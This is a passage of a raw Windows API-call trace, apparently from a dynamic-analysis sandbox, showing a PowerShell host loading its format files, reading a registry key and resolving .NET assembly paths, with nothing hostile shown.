	[0409.657] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.657] GetFileType (hFile=0x2fc) returned 0x1
	[0409.657] SetErrorMode (uMode=0x1) returned 0x1
	[0409.657] GetFileType (hFile=0x2fc) returned 0x1
	[0409.657] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.657] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.658] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.658] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.658] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.658] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0409.658] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0xaca, lpOverlapped=0x0) returned 1
	[0409.659] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427182, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427182*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.659] ReadFile (in: hFile=0x2fc, lpBuffer=0x3427b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x3427b50*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0409.659] CloseHandle (hObject=0x2fc) returned 1
	[0409.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.659] SetErrorMode (uMode=0x1) returned 0x1
	[0409.659] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0409.659] SetErrorMode (uMode=0x1) returned 0x1
	[0409.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.659] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0409.659] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0409.659] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a6c50
	[0409.660] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x1b8a6c50, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0409.660] CoTaskMemFree (pv=0x1b8a6c50) 
	[0409.660] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0409.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0410.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0410.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0410.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0410.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0410.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0410.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0410.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0410.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0410.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0410.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0410.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0410.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.355] VirtualQuery (in: lpAddress=0x20bd40, lpBuffer=0x20cc00, dwLength=0x30 | out: lpBuffer=0x20cc00*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.356] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcd151a95, Data2=0x1bd1, Data3=0x4e19, Data4=([0]=0x8e, [1]=0x41, [2]=0xbc, [3]=0xd6, [4]=0xd6, [5]=0x51, [6]=0xbc, [7]=0xd))) returned 0x0
	[0411.356] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf745c64e, Data2=0xe199, Data3=0x41e1, Data4=([0]=0xa4, [1]=0xcc, [2]=0x93, [3]=0xfb, [4]=0x7d, [5]=0xc7, [6]=0x4f, [7]=0xf2))) returned 0x0
	[0411.357] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.358] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.360] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x679ab228, Data2=0x5f4a, Data3=0x4efc, Data4=([0]=0x9d, [1]=0x41, [2]=0x37, [3]=0x8d, [4]=0xb7, [5]=0xe7, [6]=0xe0, [7]=0x68))) returned 0x0
	[0411.363] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe837406e, Data2=0x1850, Data3=0x467a, Data4=([0]=0xb7, [1]=0xc2, [2]=0x26, [3]=0xca, [4]=0x90, [5]=0xab, [6]=0xad, [7]=0xd4))) returned 0x0
	[0411.363] VirtualQuery (in: lpAddress=0x20c140, lpBuffer=0x20d000, dwLength=0x30 | out: lpBuffer=0x20d000*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.364] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.364] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.364] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x16ad5dd7, Data2=0xbca7, Data3=0x475b, Data4=([0]=0x89, [1]=0x16, [2]=0x20, [3]=0x69, [4]=0xe6, [5]=0x1d, [6]=0x90, [7]=0x48))) returned 0x0
	[0411.364] VirtualQuery (in: lpAddress=0x20c140, lpBuffer=0x20d000, dwLength=0x30 | out: lpBuffer=0x20d000*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.365] VirtualQuery (in: lpAddress=0x20bf60, lpBuffer=0x20ce20, dwLength=0x30 | out: lpBuffer=0x20ce20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.365] VirtualQuery (in: lpAddress=0x20b7b0, lpBuffer=0x20c670, dwLength=0x30 | out: lpBuffer=0x20c670*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.365] VirtualQuery (in: lpAddress=0x20b7b0, lpBuffer=0x20c670, dwLength=0x30 | out: lpBuffer=0x20c670*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.365] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x43815418, Data2=0xba85, Data3=0x492e, Data4=([0]=0xa2, [1]=0xa7, [2]=0x5a, [3]=0xd4, [4]=0x5d, [5]=0xbe, [6]=0x33, [7]=0x47))) returned 0x0
	[0411.365] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd5e1aa69, Data2=0xa7f8, Data3=0x4f2f, Data4=([0]=0xbd, [1]=0xfd, [2]=0xdc, [3]=0x8, [4]=0x3c, [5]=0x7a, [6]=0x84, [7]=0xcb))) returned 0x0
	[0411.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.366] SetErrorMode (uMode=0x1) returned 0x1
	[0411.366] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.366] GetFileType (hFile=0x2fc) returned 0x1
	[0411.366] SetErrorMode (uMode=0x1) returned 0x1
	[0411.366] GetFileType (hFile=0x2fc) returned 0x1
	[0411.366] ReadFile (in: hFile=0x2fc, lpBuffer=0x34da148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x34da148*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.367] ReadFile (in: hFile=0x2fc, lpBuffer=0x34da148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x34da148*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.367] ReadFile (in: hFile=0x2fc, lpBuffer=0x34da148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x34da148*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.367] ReadFile (in: hFile=0x2fc, lpBuffer=0x34da148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x34da148*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.693] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.693] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.693] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.693] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.694] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.695] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.696] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.696] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0xbce, lpOverlapped=0x0) returned 1
	[0411.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55a66, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55a66*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0411.697] ReadFile (in: hFile=0x2fc, lpBuffer=0x2d55ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2d55ad8*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0411.697] CloseHandle (hObject=0x2fc) returned 1
